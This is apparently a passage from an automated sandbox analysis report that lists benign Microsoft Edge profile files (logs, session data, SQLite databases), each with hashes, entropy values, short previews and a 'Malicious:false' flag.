                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:04.858 1028 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/27-01:11:04.859 1028 Recovering log #3.2024/12/27-01:11:04.859 1028 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):332
                                                                                                                                                                                                                                                                          Entropy (8bit):5.1484986706342655
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BHQds3+q2PN723oH+Tcwt865IFUt8UHQ0qZmw+UHQ0GVkwON723oH+Tcwt86+ULJ:BHcvVaYeb/WFUt8UHO/+UHi5OaYeb/+e
                                                                                                                                                                                                                                                                          MD5:2EFD749BB8FEC298CF6FC992E101A0D3
                                                                                                                                                                                                                                                                          SHA1:A26C840C65FEB9C729E182CC79E83688DE8DD386
                                                                                                                                                                                                                                                                          SHA-256:8E2E735474AFD3624ECD73BD473D44380190F6A88BA8F1E5E06996B908C301F7
                                                                                                                                                                                                                                                                          SHA-512:98C2B608806516C7849D9F439FF8F8C928A14ECDC698FED894382EDB368B38BCE52B8F6DF98F10831744775F79A7FCCC7FA39E9B9ED065A953676990304A8313
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:04.858 1028 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/27-01:11:04.859 1028 Recovering log #3.2024/12/27-01:11:04.859 1028 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1140
                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
                                                                                                                                                                                                                                                                          MD5:914FD8DC5F9A741C6947E1AB12A9D113
                                                                                                                                                                                                                                                                          SHA1:6529EFE14E7B0BEA47D78B147243096408CDAAE4
                                                                                                                                                                                                                                                                          SHA-256:8BE3C96EE64B5D2768057EA1C4D1A70F40A0041585F3173806E2278E9300960B
                                                                                                                                                                                                                                                                          SHA-512:2862BF83C061414EFA2AC035FFC25BA9C4ED523B430FDEEED4974F55D4450A62766C2E799D0ACDB8269210078547048ACAABFD78EDE6AB91133E30F6B5EBFFBD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):328
                                                                                                                                                                                                                                                                          Entropy (8bit):5.189793351276595
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BQJe/Q+q2PN723oH+Tcwt8NIFUt8UQJe/gZmw+UQSufQVkwON723oH+Tcwt8+eLJ:BQM/VvVaYebpFUt8UQM/g/+UQSGI5OaO
                                                                                                                                                                                                                                                                          MD5:89CEB1759B533D24DFBC40ACF1D9CAFF
                                                                                                                                                                                                                                                                          SHA1:229F157DF1D1B75F666DA1B83EC452B0E157152A
                                                                                                                                                                                                                                                                          SHA-256:038150402E67275FE4E8F8461004B664DA7A454E5586657A0B9369D290AB2D2D
                                                                                                                                                                                                                                                                          SHA-512:B17915A1156925E6BB1709B38BA2A640D4851A53DC6F743A75E230FF01F75E33DF50FA50D46787F7543A350080CC3BC6E3B2336E8CED614EF7DAF43DFE37FE75
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:05.426 1b98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/27-01:11:05.426 1b98 Recovering log #3.2024/12/27-01:11:05.427 1b98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):328
                                                                                                                                                                                                                                                                          Entropy (8bit):5.189793351276595
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BQJe/Q+q2PN723oH+Tcwt8NIFUt8UQJe/gZmw+UQSufQVkwON723oH+Tcwt8+eLJ:BQM/VvVaYebpFUt8UQM/g/+UQSGI5OaO
                                                                                                                                                                                                                                                                          MD5:89CEB1759B533D24DFBC40ACF1D9CAFF
                                                                                                                                                                                                                                                                          SHA1:229F157DF1D1B75F666DA1B83EC452B0E157152A
                                                                                                                                                                                                                                                                          SHA-256:038150402E67275FE4E8F8461004B664DA7A454E5586657A0B9369D290AB2D2D
                                                                                                                                                                                                                                                                          SHA-512:B17915A1156925E6BB1709B38BA2A640D4851A53DC6F743A75E230FF01F75E33DF50FA50D46787F7543A350080CC3BC6E3B2336E8CED614EF7DAF43DFE37FE75
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:05.426 1b98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/27-01:11:05.426 1b98 Recovering log #3.2024/12/27-01:11:05.427 1b98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):412
                                                                                                                                                                                                                                                                          Entropy (8bit):5.228792081316709
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:B4KL+vVaYeb8rcHEZrELFUt8Uw/+UALV5OaYeb8rcHEZrEZSJ:m3VaYeb8nZrExg8GOaYeb8nZrEZe
                                                                                                                                                                                                                                                                          MD5:47002C412D4863E770EE4D1ED70A4ABD
                                                                                                                                                                                                                                                                          SHA1:FAF91BDE87AF206334F73598B635EBA01EE1AC5B
                                                                                                                                                                                                                                                                          SHA-256:CFC80E2C61DA8F3F15873B78D574E40373088E4266F3FDAF642A97B2732EA957
                                                                                                                                                                                                                                                                          SHA-512:FB4C52EA8C4899BFEF937170C6CCF6C4B8363C7B3FEF7124DC39B6F48FD02E739C056499F0C22FF660F71E51919A23F81B44481C36DE8270CADA67C04868D784
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:08.670 14ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/27-01:11:08.671 14ac Recovering log #3.2024/12/27-01:11:08.671 14ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):412
                                                                                                                                                                                                                                                                          Entropy (8bit):5.228792081316709
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:B4KL+vVaYeb8rcHEZrELFUt8Uw/+UALV5OaYeb8rcHEZrEZSJ:m3VaYeb8nZrExg8GOaYeb8nZrEZe
                                                                                                                                                                                                                                                                          MD5:47002C412D4863E770EE4D1ED70A4ABD
                                                                                                                                                                                                                                                                          SHA1:FAF91BDE87AF206334F73598B635EBA01EE1AC5B
                                                                                                                                                                                                                                                                          SHA-256:CFC80E2C61DA8F3F15873B78D574E40373088E4266F3FDAF642A97B2732EA957
                                                                                                                                                                                                                                                                          SHA-512:FB4C52EA8C4899BFEF937170C6CCF6C4B8363C7B3FEF7124DC39B6F48FD02E739C056499F0C22FF660F71E51919A23F81B44481C36DE8270CADA67C04868D784
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:08.670 14ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/27-01:11:08.671 14ac Recovering log #3.2024/12/27-01:11:08.671 14ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):337
                                                                                                                                                                                                                                                                          Entropy (8bit):5.162725875759367
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BaJFIq2PN723oH+Tcwt8a2jMGIFUt8UaSqU9Zmw+UacJFkwON723oH+Tcwt8a2jz:BzvVaYeb8EFUt8UUU9/+UXX5OaYeb8bJ
                                                                                                                                                                                                                                                                          MD5:74DECC26BE36273159339CD46D0FC480
                                                                                                                                                                                                                                                                          SHA1:501182EFBE243EEF3ECB9392446A9FC2D25C9C95
                                                                                                                                                                                                                                                                          SHA-256:10ADD6A425C8946D6958346D3C26C0F873C97FA0246241E5F985F5AEFABC54EA
                                                                                                                                                                                                                                                                          SHA-512:22B131DC2FE68AC36BE96B82A69DD45D9CD6B916E77393784CFCC56AFA0EDD0ADA4434DEAC966DAE4C88CC0D8DCC14714E20EB866A920DD02DF26C8394C68B87
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:05.486 514 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/27-01:11:05.487 514 Recovering log #3.2024/12/27-01:11:05.489 514 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):337
                                                                                                                                                                                                                                                                          Entropy (8bit):5.162725875759367
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BaJFIq2PN723oH+Tcwt8a2jMGIFUt8UaSqU9Zmw+UacJFkwON723oH+Tcwt8a2jz:BzvVaYeb8EFUt8UUU9/+UXX5OaYeb8bJ
                                                                                                                                                                                                                                                                          MD5:74DECC26BE36273159339CD46D0FC480
                                                                                                                                                                                                                                                                          SHA1:501182EFBE243EEF3ECB9392446A9FC2D25C9C95
                                                                                                                                                                                                                                                                          SHA-256:10ADD6A425C8946D6958346D3C26C0F873C97FA0246241E5F985F5AEFABC54EA
                                                                                                                                                                                                                                                                          SHA-512:22B131DC2FE68AC36BE96B82A69DD45D9CD6B916E77393784CFCC56AFA0EDD0ADA4434DEAC966DAE4C88CC0D8DCC14714E20EB866A920DD02DF26C8394C68B87
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:05.486 514 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/27-01:11:05.487 514 Recovering log #3.2024/12/27-01:11:05.489 514 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\89b051d3-91a0-4c19-b2cf-0ce385b44c65.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF51de0.TMP (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\dce018b8-f5ea-46a2-91d8-32c3d7d64a3e.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                          Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                          MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                          SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                          SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                          SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):242
                                                                                                                                                                                                                                                                          Entropy (8bit):4.356737152904909
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:S85aEFljljljljlcQlllaV93Jiwv8qedUV:S+a8ljljljljl1lcD8XW
                                                                                                                                                                                                                                                                          MD5:15CFC898C6B74000F96F55270CD7C3EC
                                                                                                                                                                                                                                                                          SHA1:8E59035E62422D8C2D8E2C5EDC95D636A0C66DE7
                                                                                                                                                                                                                                                                          SHA-256:D6065F5D9092C88BD835B7485ECF4FB814A67C24020AA2BC8FFC743895399039
                                                                                                                                                                                                                                                                          SHA-512:123A22B32B8C1A4D56118B680FDEA131406D615DBDC3DEA82BEC4008933BFAB05870FED3699B410A75E6D9993717ACD952140922F05FF1B3E8A299EA6013E681
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...................b................next-map-id.1.Cnamespace-a3899006_d8bd_4d47_91df_9f04a4290019-https://ntp.msn.com/.0

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):325
                                                                                                                                                                                                                                                                          Entropy (8bit):5.089611823463568
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BNOq2PN723oH+TcwtrQMxIFUt8UnFZZmw+UbFkwON723oH+TcwtrQMFLJ:BcvVaYebCFUt8UnFZ/+UbF5OaYebtJ
                                                                                                                                                                                                                                                                          MD5:5C36E6A3DBFE19B2F9880C0DFD854BEA
                                                                                                                                                                                                                                                                          SHA1:49FB3E06F1295664649D2CE6FA9D4DBD0B2502AC
                                                                                                                                                                                                                                                                          SHA-256:467AA74A545CDBBB7092283E9BDB0597C38BE2D72B71763EF956D6699AB2B333
                                                                                                                                                                                                                                                                          SHA-512:4A6E4B8603EC3A500026A740FFD243C41E166F4EBDDF751751C335938269262E6FE0597AE3C1B3652388769E35FA4CA0DC19381B5351AEC55FBCB2B873A8C601
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:05.470 514 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/27-01:11:05.472 514 Recovering log #3.2024/12/27-01:11:05.476 514 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):325
                                                                                                                                                                                                                                                                          Entropy (8bit):5.089611823463568
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BNOq2PN723oH+TcwtrQMxIFUt8UnFZZmw+UbFkwON723oH+TcwtrQMFLJ:BcvVaYebCFUt8UnFZ/+UbF5OaYebtJ
                                                                                                                                                                                                                                                                          MD5:5C36E6A3DBFE19B2F9880C0DFD854BEA
                                                                                                                                                                                                                                                                          SHA1:49FB3E06F1295664649D2CE6FA9D4DBD0B2502AC
                                                                                                                                                                                                                                                                          SHA-256:467AA74A545CDBBB7092283E9BDB0597C38BE2D72B71763EF956D6699AB2B333
                                                                                                                                                                                                                                                                          SHA-512:4A6E4B8603EC3A500026A740FFD243C41E166F4EBDDF751751C335938269262E6FE0597AE3C1B3652388769E35FA4CA0DC19381B5351AEC55FBCB2B873A8C601
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:05.470 514 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/27-01:11:05.472 514 Recovering log #3.2024/12/27-01:11:05.476 514 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13379753467228388

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1443
                                                                                                                                                                                                                                                                          Entropy (8bit):3.841395052977094
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:3ip/+4ZFePFB4ZP98PFnpsAF4unxmtLp3X2amEtG1Chq2Skw3A3QKkOAM4:3ip/+i+B+P9QnzFYLp2FEkChI3AgHOp
                                                                                                                                                                                                                                                                          MD5:784390EF033FAE77AF3F5A7FC2B347DC
                                                                                                                                                                                                                                                                          SHA1:7F99C27E67FBE73B811C9E07DD275EC5AA55F6EE
                                                                                                                                                                                                                                                                          SHA-256:2CCAC8236804B11AF3B5BA451583DBFDD16B8C49A504BF95CC402E6AFB3B38C8
                                                                                                                                                                                                                                                                          SHA-512:7BC9F973591272B8B20A64466A0DB6C3D833A029DCEB30EC2F4398D88E2D38A2B53F38E97633EA6E21E23264884D52344A69EB933B563F00EB88664D19E322AD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SNSS........#.*............#.*......".#.*............#.*........#.*........#.*........#.*....!...#.*................................#.*.#.*1..,....#.*$...a3899006_d8bd_4d47_91df_9f04a4290019....#.*........#.*................#.*....#.*........................#.*....................5..0....#.*&...{46F3A197-DB49-410A-81B3-94975C835573}......#.*........#.*...........................#.*............#.*........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x........>"T:*...>"T:*.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                          Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                          MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                          SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                          SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
